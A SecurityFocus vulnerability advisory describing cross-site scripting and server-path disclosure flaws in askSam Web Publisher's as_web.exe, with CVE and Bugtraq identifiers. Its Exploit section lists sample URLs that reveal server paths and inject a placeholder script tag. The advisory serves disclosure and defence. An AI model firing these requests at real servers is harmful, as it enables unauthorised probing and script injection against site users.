askSam Web Publisher Cross Site Scripting Vulnerability

askSam is a database system. An optional component, askSam Web Publisher (versions 1 and 4), is reportedly vulnerable to cross site scripting vulnerability in the as_web.exe (or as_web4.exe) component. This is due to a failure to strip script and HTML when returning error messages that include user input.

The same component can also disclose paths on the server when non-existant files are requested.

Information

Bugtraq ID: 4670
Class: Input Validation Error
CVE: CVE-2002-1727
CVE-2002-1728

Remote: Yes
Local: No
Published: May 04 2002 12:00AM
Updated: Jan 31 2019 02:00AM
Credit: Posted to BugTraq on May 5, 2002 by frog frog <[email protected]>
Vulnerable: askSam systems askSam Web Publisher 4.0
- askSam systems askSam 4.0

Not Vulnerable:

Exploit

The following examples will display an error message containing the complete path to the askSam directory:
http://somewhere/as_web.exe?Command=search&amp;file=non-existant-file&amp;request=&amp;MaxHits=10&amp;NumLines=1
http://somewhere/as_web.exe?non-existant
http://somewhere/as_web4.exe?Command=First&amp;File=non-existant-file
These examples demonstrate the cross site scripting issue:
/as_web4.exe?existant-ask-file!!.ask+B+&amp;lt;script&amp;gt;ANYSCRIPT&amp;lt;/script&amp;gt;
/as_web.exe?existant-ask-file!!.ask+B+&amp;lt;script&amp;gt;ANYSCRIPT&amp;lt;script&amp;gt;

References:

• askSam Product Page (askSam systems)
  

Source: www.securityfocus.com